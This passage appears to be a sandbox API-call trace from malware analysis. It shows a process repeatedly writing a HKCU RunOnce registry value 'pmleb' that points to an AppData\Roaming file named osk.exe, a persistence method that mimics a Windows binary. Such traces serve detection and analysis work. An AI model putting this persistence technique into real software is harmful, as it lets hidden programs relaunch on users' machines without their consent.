lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.290] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.290] RegCloseKey (hKey=0x280) returned 0x0 [0096.290] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.290] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.291] SetTimer (hWnd=0x20280, nIDEvent=0x2290, uElapse=0xa, lpTimerFunc=0x0) returned 0x2290 [0096.291] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.304] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.304] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.304] KillTimer (hWnd=0x20280, uIDEvent=0x2290) returned 1 [0096.305] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.305] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.305] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.305] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.306] RegCloseKey (hKey=0x280) returned 0x0 [0096.306] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0096.306] SetTimer (hWnd=0x20280, nIDEvent=0x2291, uElapse=0xa, lpTimerFunc=0x0) returned 0x2291 [0096.306] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.320] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.320] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.320] KillTimer (hWnd=0x20280, uIDEvent=0x2291) returned 1 [0096.320] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.321] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.321] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.321] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.321] RegCloseKey (hKey=0x280) returned 0x0 [0096.321] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.322] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.322] SetTimer (hWnd=0x20280, nIDEvent=0x2292, uElapse=0xa, lpTimerFunc=0x0) returned 0x2292 [0096.322] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.335] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.336] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.336] KillTimer (hWnd=0x20280, uIDEvent=0x2292) returned 1 [0096.336] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.336] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.336] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.337] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.337] RegCloseKey (hKey=0x280) returned 0x0 [0096.337] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.337] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.337] SetTimer (hWnd=0x20280, nIDEvent=0x2293, uElapse=0xa, lpTimerFunc=0x0) returned 0x2293 [0096.337] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.351] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.351] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.351] KillTimer (hWnd=0x20280, uIDEvent=0x2293) returned 1 [0096.351] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.352] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.352] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.352] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.352] RegCloseKey (hKey=0x280) returned 0x0 [0096.352] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.352] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.353] SetTimer (hWnd=0x20280, nIDEvent=0x2294, uElapse=0xa, lpTimerFunc=0x0) returned 0x2294 
[0096.353] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.367] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.367] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.367] KillTimer (hWnd=0x20280, uIDEvent=0x2294) returned 1 [0096.367] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.368] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.368] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.368] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.368] RegCloseKey (hKey=0x280) returned 0x0 [0096.368] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.368] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.369] SetTimer (hWnd=0x20280, nIDEvent=0x2295, uElapse=0xa, lpTimerFunc=0x0) returned 0x2295 [0096.369] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.382] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.382] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.383] KillTimer (hWnd=0x20280, uIDEvent=0x2295) returned 1 [0096.383] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.383] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.383] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.384] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.384] RegCloseKey (hKey=0x280) returned 0x0 [0096.384] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.384] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.384] SetTimer (hWnd=0x20280, nIDEvent=0x2296, uElapse=0xa, lpTimerFunc=0x0) returned 0x2296 [0096.384] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.398] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.398] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.398] KillTimer (hWnd=0x20280, uIDEvent=0x2296) returned 1 [0096.398] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.399] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.399] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.399] RegCloseKey (hKey=0x280) returned 0x0 [0096.399] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.399] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.400] SetTimer (hWnd=0x20280, nIDEvent=0x2297, uElapse=0xa, lpTimerFunc=0x0) returned 0x2297 [0096.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0096.414] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.414] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.414] KillTimer (hWnd=0x20280, uIDEvent=0x2297) returned 1 [0096.414] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.415] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.415] RegCloseKey (hKey=0x280) returned 0x0 [0096.415] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.415] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.415] SetTimer (hWnd=0x20280, nIDEvent=0x2298, uElapse=0xa, lpTimerFunc=0x0) returned 0x2298 [0096.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.429] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.429] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.429] KillTimer (hWnd=0x20280, uIDEvent=0x2298) returned 1 [0096.430] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.430] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.430] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.430] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.431] RegCloseKey (hKey=0x280) returned 0x0 [0096.431] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.431] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.431] SetTimer (hWnd=0x20280, nIDEvent=0x2299, uElapse=0xa, lpTimerFunc=0x0) returned 0x2299 [0096.431] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.445] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.445] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.445] KillTimer (hWnd=0x20280, uIDEvent=0x2299) returned 1 [0096.445] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.445] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.445] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.446] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.446] RegCloseKey (hKey=0x280) returned 0x0 [0096.446] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.446] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.446] SetTimer (hWnd=0x20280, nIDEvent=0x229a, uElapse=0xa, lpTimerFunc=0x0) returned 0x229a [0096.446] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.460] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.460] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.461] KillTimer (hWnd=0x20280, uIDEvent=0x229a) returned 1 [0096.461] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.461] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.461] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.462] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.462] RegCloseKey (hKey=0x280) returned 0x0 [0096.462] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.462] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.462] SetTimer (hWnd=0x20280, nIDEvent=0x229b, uElapse=0xa, lpTimerFunc=0x0) returned 0x229b [0096.462] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.476] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.476] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.476] KillTimer (hWnd=0x20280, uIDEvent=0x229b) returned 1 [0096.477] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.477] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.477] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.477] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.477] RegCloseKey (hKey=0x280) returned 0x0 [0096.478] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.478] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.478] SetTimer (hWnd=0x20280, nIDEvent=0x229c, uElapse=0xa, lpTimerFunc=0x0) returned 0x229c [0096.478] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.491] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.491] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.492] KillTimer (hWnd=0x20280, uIDEvent=0x229c) returned 1 [0096.492] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.492] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.492] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.493] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.493] RegCloseKey (hKey=0x280) returned 0x0 [0096.493] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.493] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.493] SetTimer (hWnd=0x20280, nIDEvent=0x229d, uElapse=0xa, lpTimerFunc=0x0) returned 0x229d [0096.493] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.517] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.517] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.518] KillTimer (hWnd=0x20280, 
uIDEvent=0x229d) returned 1 [0096.518] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.518] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.519] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.519] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.519] RegCloseKey (hKey=0x280) returned 0x0 [0096.519] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.519] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.519] SetTimer (hWnd=0x20280, nIDEvent=0x229e, uElapse=0xa, lpTimerFunc=0x0) returned 0x229e [0096.519] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.523] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.523] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.523] KillTimer (hWnd=0x20280, uIDEvent=0x229e) returned 1 [0096.523] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.523] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.523] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.524] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.524] RegCloseKey (hKey=0x280) returned 0x0 [0096.524] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.524] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.524] SetTimer (hWnd=0x20280, nIDEvent=0x229f, uElapse=0xa, lpTimerFunc=0x0) returned 0x229f [0096.524] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.538] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.538] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.539] KillTimer (hWnd=0x20280, uIDEvent=0x229f) returned 1 [0096.539] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.539] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.539] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.540] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.540] RegCloseKey (hKey=0x280) returned 0x0 [0096.540] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.540] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.540] SetTimer (hWnd=0x20280, nIDEvent=0x22a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a0 [0096.540] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.554] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.554] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.554] KillTimer (hWnd=0x20280, uIDEvent=0x22a0) returned 1 [0096.554] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0096.555] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.555] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.555] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.555] RegCloseKey (hKey=0x280) returned 0x0 [0096.556] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.556] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.556] SetTimer (hWnd=0x20280, nIDEvent=0x22a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x22a1 [0096.556] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.569] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.569] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.570] KillTimer (hWnd=0x20280, uIDEvent=0x22a1) returned 1 [0096.570] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.571] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.571] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.571] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.571] RegCloseKey (hKey=0x280) returned 0x0 
